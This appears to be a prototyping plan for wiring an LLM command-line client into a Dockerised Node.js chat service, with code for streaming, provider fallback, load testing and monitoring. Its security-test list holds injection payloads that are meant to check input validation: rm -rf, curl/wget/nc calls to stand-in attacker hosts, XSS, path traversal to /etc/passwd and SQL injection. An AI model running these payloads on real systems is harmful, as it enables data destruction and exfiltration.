LLM CLI Integration Prototyping Plan
Generated: 2025-08-05 UTC
Purpose: Systematic approach to prototype and validate LLM CLI integration for Sasha Studio
Target: Docker-based Node.js application with real-time AI chat streaming
Prototype Objectives
- Validate streaming performance - Token-by-token response rendering
- Test multi-provider routing - Fallback mechanisms and cost optimization
- Verify Docker integration - Container setup and security patterns
- Measure error handling - Connection resilience and recovery
- Assess scalability - Concurrent request handling
Prototype Architecture
Phase 1: Core Integration Test (Week 1)
Prototype 1A: Basic CLI Streaming
βββββββββββββββββββ spawn() ββββββββββββββββ stdout βββββββββββββββββββ
β Node.js API ββββββββββββββββΊβ AIChat CLI βββββββββββββββΊβ WebSocket β
β Server β β Process β β Client β
βββββββββββββββββββ ββββββββββββββββ βββββββββββββββββββ
Validation Criteria:
- Token-by-token streaming without blocking
- Process cleanup on connection close
- Error handling for CLI failures
- Memory usage under load
Expected Timeline: 2-3 days
Prototype 1B: Multi-Provider Testing
βββββββββββββββββββ ββββββββββββββββ
β Provider Routerββββ β OpenAI API β
β Logic β β β (via CLI) β
βββββββββββββββββββ β ββββββββββββββββ
β
ββββββββββββΊββββββββββββββββ
β β Claude API β
β β (via CLI) β
β ββββββββββββββββ
β
ββββββββββββΊββββββββββββββββ
β Gemini API β
β (via CLI) β
ββββββββββββββββ
Validation Criteria:
- Automatic fallback when provider fails
- Cost calculation accuracy
- Provider-specific error handling
- Configuration management
Expected Timeline: 2-3 days
Docker Integration Strategy
Phase 2: Container Architecture (Week 1-2)
Dockerfile Prototype
FROM node:20-alpine AS base
# Install AIChat CLI (most comprehensive alternative to LLxprt)
RUN wget https://github.com/sigoden/aichat/releases/latest/download/aichat-v0.30.0-x86_64-unknown-linux-musl.tar.gz \
&& tar -xzf aichat-v0.30.0-x86_64-unknown-linux-musl.tar.gz \
&& mv aichat /usr/local/bin/ \
&& chmod +x /usr/local/bin/aichat \
&& rm aichat-v0.30.0-x86_64-unknown-linux-musl.tar.gz
# Create non-root user for security
RUN addgroup -g 1001 -S nodejs && \
adduser -S nodejs -u 1001
# Setup configuration directory
RUN mkdir -p /app/.config/aichat && \
chown -R nodejs:nodejs /app
FROM base AS development
WORKDIR /app
USER nodejs
# Copy package files
COPY --chown=nodejs:nodejs package*.json ./
RUN npm ci --only=development
# Copy source code
COPY --chown=nodejs:nodejs . .
EXPOSE 3000
CMD ["npm", "run", "dev"]
FROM base AS production
WORKDIR /app
USER nodejs
# Copy package files and install production dependencies
COPY --chown=nodejs:nodejs package*.json ./
RUN npm ci --omit=dev
# Copy source code
COPY --chown=nodejs:nodejs . .
EXPOSE 3000
CMD ["node", "server.js"]
Configuration Management
# .config/aichat/config.yaml
model: openai:gpt-4
temperature: 0.7
stream: true
save: false # Don't save conversations to avoid disk bloat
clients:
- type: openai
api_key: ${OPENAI_API_KEY}
api_base: https://api.openai.com/v1
- type: claude
api_key: ${ANTHROPIC_API_KEY}
api_base: https://api.anthropic.com
- type: gemini
api_key: ${GOOGLE_API_KEY}
api_base: https://generativelanguage.googleapis.com
Validation Criteria:
- Secure API key management via environment variables
- Non-root container execution
- Proper file permissions and ownership
- Resource limits and health checks
Streaming Implementation Patterns
Phase 3: Real-Time Communication (Week 2)
WebSocket + CLI Integration
// prototype/streaming-integration.js
const { spawn } = require('child_process');
const WebSocket = require('ws');
const express = require('express');
class StreamingLLMService {
constructor() {
this.activeStreams = new Map();
}
async startStream(sessionId, message, model = 'openai:gpt-4') {
const startTime = Date.now();
// Spawn CLI process with streaming
const process = spawn('aichat', [
'-m', model,
'--stream',
'--no-save',
message
], {
env: {
...process.env,
AICHAT_CONFIG_DIR: '/app/.config/aichat'
}
});
this.activeStreams.set(sessionId, {
process,
startTime,
chunks: 0,
totalChars: 0
});
return process;
}
setupWebSocketHandling(wss) {
wss.on('connection', (ws, req) => {
const sessionId = req.url.split('session=')[1];
ws.on('message', async (data) => {
try {
const { message, model } = JSON.parse(data);
const process = await this.startStream(sessionId, message, model);
// Stream stdout to WebSocket
process.stdout.on('data', (chunk) => {
const streamData = this.activeStreams.get(sessionId);
if (streamData) {
streamData.chunks++;
streamData.totalChars += chunk.length;
}
ws.send(JSON.stringify({
type: 'chunk',
content: chunk.toString(),
sessionId
}));
});
// Handle completion
process.on('close', (code) => {
const streamData = this.activeStreams.get(sessionId);
const duration = Date.now() - streamData?.startTime || 0;
ws.send(JSON.stringify({
type: 'complete',
sessionId,
metadata: {
duration,
chunks: streamData?.chunks || 0,
totalChars: streamData?.totalChars || 0,
exitCode: code
}
}));
this.activeStreams.delete(sessionId);
});
// Error handling
process.stderr.on('data', (error) => {
ws.send(JSON.stringify({
type: 'error',
error: error.toString(),
sessionId
}));
});
} catch (error) {
ws.send(JSON.stringify({
type: 'error',
error: error.message,
sessionId
}));
}
});
ws.on('close', () => {
// Cleanup any active processes for this session
const streamData = this.activeStreams.get(sessionId);
if (streamData?.process) {
streamData.process.kill('SIGTERM');
this.activeStreams.delete(sessionId);
}
});
});
}
}
Provider Fallback Logic
// prototype/provider-router.js
class ProviderRouter {
constructor() {
this.providers = {
'openai': { models: ['gpt-4', 'gpt-3.5-turbo'], priority: 1 },
'claude': { models: ['claude-3-sonnet', 'claude-3-haiku'], priority: 2 },
'gemini': { models: ['gemini-pro'], priority: 3 }
};
this.healthStatus = new Map();
this.lastHealthCheck = new Map();
}
async routeRequest(message, preferredProvider = null) {
const availableProviders = await this.getHealthyProviders();
if (preferredProvider && availableProviders.includes(preferredProvider)) {
return this.executeWithProvider(preferredProvider, message);
}
// Try providers in priority order
for (const provider of availableProviders) {
try {
return await this.executeWithProvider(provider, message);
} catch (error) {
console.warn(`Provider ${provider} failed, trying next:`, error.message);
this.markProviderUnhealthy(provider);
continue;
}
}
throw new Error('All providers failed');
}
async executeWithProvider(provider, message) {
const model = `${provider}:${this.providers[provider].models[0]}`;
return new Promise((resolve, reject) => {
const process = spawn('aichat', ['-m', model, '--stream', message]);
let response = '';
process.stdout.on('data', (chunk) => {
response += chunk.toString();
});
process.on('close', (code) => {
if (code === 0) {
this.markProviderHealthy(provider);
resolve({ provider, model, response });
} else {
reject(new Error(`Provider ${provider} exited with code ${code}`));
}
});
process.stderr.on('data', (error) => {
reject(new Error(`Provider ${provider} error: ${error.toString()}`));
});
});
}
async getHealthyProviders() {
const healthy = [];
for (const [provider, config] of Object.entries(this.providers)) {
if (await this.isProviderHealthy(provider)) {
healthy.push(provider);
}
}
return healthy.sort((a, b) =>
this.providers[a].priority - this.providers[b].priority
);
}
async isProviderHealthy(provider) {
const lastCheck = this.lastHealthCheck.get(provider) || 0;
const now = Date.now();
// Cache health status for 5 minutes
if (now - lastCheck < 5 * 60 * 1000) {
return this.healthStatus.get(provider) !== false;
}
try {
// Quick health check with minimal request
await this.executeWithProvider(provider, 'test');
this.healthStatus.set(provider, true);
this.lastHealthCheck.set(provider, now);
return true;
} catch (error) {
this.healthStatus.set(provider, false);
this.lastHealthCheck.set(provider, now);
return false;
}
}
markProviderHealthy(provider) {
this.healthStatus.set(provider, true);
this.lastHealthCheck.set(provider, Date.now());
}
markProviderUnhealthy(provider) {
this.healthStatus.set(provider, false);
this.lastHealthCheck.set(provider, Date.now());
}
}
Validation Criteria:
- Sub-second first token response time
- Smooth streaming without UI blocking
- Graceful WebSocket reconnection
- Automatic provider failover
- Memory usage remains stable under load
Performance Testing Strategy
Phase 4: Load Testing (Week 2-3)
Concurrent Stream Testing
// prototype/load-test.js
const WebSocket = require('ws');
async function loadTest() {
const concurrentConnections = 10;
const messagesPerConnection = 5;
const connections = [];
console.log('Starting load test...');
console.log(`Concurrent connections: ${concurrentConnections}`);
console.log(`Messages per connection: ${messagesPerConnection}`);
for (let i = 0; i < concurrentConnections; i++) {
const ws = new WebSocket(`ws://localhost:3000/ws?session=test-${i}`);
connections.push({
ws,
sessionId: `test-${i}`,
messagesSent: 0,
responses: [],
startTime: Date.now()
});
ws.on('open', () => {
console.log(`Connection ${i} opened`);
sendNextMessage(connections[i]);
});
ws.on('message', (data) => {
const message = JSON.parse(data);
const conn = connections[i];
if (message.type === 'complete') {
conn.responses.push({
duration: Date.now() - conn.startTime,
chunks: message.metadata.chunks
});
if (conn.messagesSent < messagesPerConnection) {
setTimeout(() => sendNextMessage(conn), 1000);
} else {
ws.close();
}
}
});
}
function sendNextMessage(conn) {
conn.messagesSent++;
conn.startTime = Date.now();
conn.ws.send(JSON.stringify({
message: `Test message ${conn.messagesSent} for load testing`,
model: 'openai:gpt-3.5-turbo'
}));
}
}
loadTest().catch(console.error);
Memory and Resource Monitoring
// prototype/monitor.js
class SystemMonitor {
constructor() {
this.metrics = {
memoryUsage: [],
activeProcesses: 0,
responseTimeHistory: [],
errorRate: 0
};
this.startMonitoring();
}
startMonitoring() {
setInterval(() => {
const usage = process.memoryUsage();
this.metrics.memoryUsage.push({
timestamp: Date.now(),
heapUsed: usage.heapUsed / 1024 / 1024, // MB
heapTotal: usage.heapTotal / 1024 / 1024, // MB
external: usage.external / 1024 / 1024 // MB
});
// Keep only last 100 measurements
if (this.metrics.memoryUsage.length > 100) {
this.metrics.memoryUsage.shift();
}
}, 5000);
}
recordResponseTime(duration) {
this.metrics.responseTimeHistory.push(duration);
if (this.metrics.responseTimeHistory.length > 1000) {
this.metrics.responseTimeHistory.shift();
}
}
getAverageResponseTime() {
if (this.metrics.responseTimeHistory.length === 0) return 0;
const sum = this.metrics.responseTimeHistory.reduce((a, b) => a + b, 0);
return sum / this.metrics.responseTimeHistory.length;
}
getMemoryTrend() {
if (this.metrics.memoryUsage.length < 2) return 'stable';
const recent = this.metrics.memoryUsage.slice(-10);
const trend = recent[recent.length - 1].heapUsed - recent[0].heapUsed;
if (trend > 10) return 'increasing';
if (trend < -10) return 'decreasing';
return 'stable';
}
}
Performance Targets:
- First Token: < 500ms
- Memory Growth: < 5MB/hour under normal load
- Concurrent Streams: 10+ simultaneous users
- Error Rate: < 1% under normal conditions
- CPU Usage: < 50% during streaming
Security Validation
Phase 5: Security Testing (Week 3)
Input Sanitization Testing
// prototype/security-tests.js
const securityTests = [
// Command injection attempts
'test; rm -rf /',
'test && curl evil.com',
'test | nc attacker.com 1234',
'test $(wget evil.com)',
// XSS attempts
'<script>alert("xss")</script>',
'javascript:alert(1)',
// Path traversal
'../../../etc/passwd',
'..\\..\\windows\\system32',
// SQL injection patterns
"'; DROP TABLE users; --",
'1 OR 1=1',
// Extremely long inputs
'A'.repeat(100000),
// Special characters
String.fromCharCode(0, 1, 2, 3, 4, 5)
];
async function runSecurityTests() {
for (const testInput of securityTests) {
try {
console.log(`Testing: ${testInput.substring(0, 50)}...`);
const ws = new WebSocket('ws://localhost:3000/ws?session=security-test');
ws.on('open', () => {
ws.send(JSON.stringify({
message: testInput,
model: 'openai:gpt-3.5-turbo'
}));
});
ws.on('message', (data) => {
const response = JSON.parse(data);
if (response.type === 'error') {
console.log('β
Properly rejected malicious input');
} else {
console.log('β οΈ Input was processed - review for security issues');
}
ws.close();
});
} catch (error) {
console.log('β
Input properly rejected:', error.message);
}
await new Promise(resolve => setTimeout(resolve, 100));
}
}
Security Validation Criteria:
- Command injection prevention
- Input length limits enforced
- Special character handling
- Process isolation maintained
- API key exposure prevention
Success Metrics & KPIs
Technical Performance
- Streaming Latency: First token < 500ms, subsequent tokens < 50ms
- Memory Efficiency: < 100MB base usage, < 5MB growth per hour
- Error Recovery: < 5 second reconnection time
- Process Management: Zero zombie processes after 24h operation
Provider Integration
- Fallback Success Rate: > 99% successful fallback when primary fails
- Cost Accuracy: Β±5% accuracy in cost calculations
- Provider Coverage: Support for 3+ major providers (OpenAI, Anthropic, Google)
Security & Reliability
- Input Validation: 100% malicious input rejection
- Container Security: Non-root execution, minimal privileges
- Audit Logging: Complete request/response logging for compliance
Decision Framework
Prototype Success Criteria
PROCEED with full implementation if:
- All streaming tests pass performance targets
- Provider fallback works reliably
- Security validation shows no vulnerabilities
- Memory usage remains stable under load
- Docker integration is seamless
PIVOT to alternative approach if:
- Streaming latency > 1 second consistently
- Memory leaks detected in 24h testing
- Command injection or security issues found
- Provider fallback fails > 5% of time
- Docker setup is complex or unreliable
ITERATE prototypes if:
- Performance is close but needs optimization
- One provider consistently fails
- Minor security issues that can be fixed
- Docker setup needs refinement
Implementation Timeline
Week 1: Core Prototyping
- Days 1-2: Basic CLI streaming integration
- Days 3-4: Multi-provider testing and fallback
- Days 5-7: Docker container integration and testing
Week 2: Advanced Features
- Days 1-3: WebSocket real-time streaming
- Days 4-5: Load testing and performance optimization
- Days 6-7: Security testing and validation
Week 3: Documentation & Decision
- Days 1-2: Create comprehensive integration guide
- Days 3-4: Document all patterns and lessons learned
- Days 5-7: Final recommendation and next steps
Feedback Loop
After each prototype phase:
- Measure against success criteria
- Document lessons learned
- Identify optimization opportunities
- Update implementation approach
- Create reusable patterns
This systematic approach ensures we build robust, scalable LLM integration with confidence in our technical decisions.
This prototyping plan provides a comprehensive path from concept to production-ready implementation, with clear validation criteria and decision points along the way.